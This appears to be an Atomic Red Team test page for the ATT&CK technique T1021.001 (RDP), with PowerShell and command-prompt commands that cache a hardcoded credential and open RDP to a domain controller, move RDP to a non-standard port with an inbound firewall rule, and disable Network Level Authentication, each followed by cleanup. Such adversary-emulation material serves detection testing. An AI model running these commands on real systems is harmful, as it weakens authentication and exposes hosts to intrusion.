# T1021.001 - Remote Desktop Protocol
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)

## Atomic Tests

### Atomic Test #1 - RDP to DomainController
Attempt an RDP session via Remote Desktop Application to a DomainController.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$Server=$ENV:logonserver.TrimStart("\")
$User = Join-Path $Env:USERDOMAIN $ENV:USERNAME
$Password="1password2!"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 1

#### Cleanup: 
```powershell
$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Changing RDP Port to Non Standard Port via PowershellChanging RDP Port to Non Standard Port via Powershell
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value 4489
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 2

#### Cleanup: 
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value 3389
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction Ignore 
Get-Service TermService | Restart-Service -Force -ErrorAction Ignore 
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_PromptChanging RDP Port to Non Standard Port via Command_Prompt
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 4489 /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=4489
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 3

#### Cleanup: 
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
net stop TermService /y >nul 2>&1
net start TermService >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Disable NLA for RDP via Command PromptDisables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt
Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 4

#### Cleanup: 
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 1 /t REG_DWORD -f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1021.001 -TestNumbers 4 -Cleanup

## Detection
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.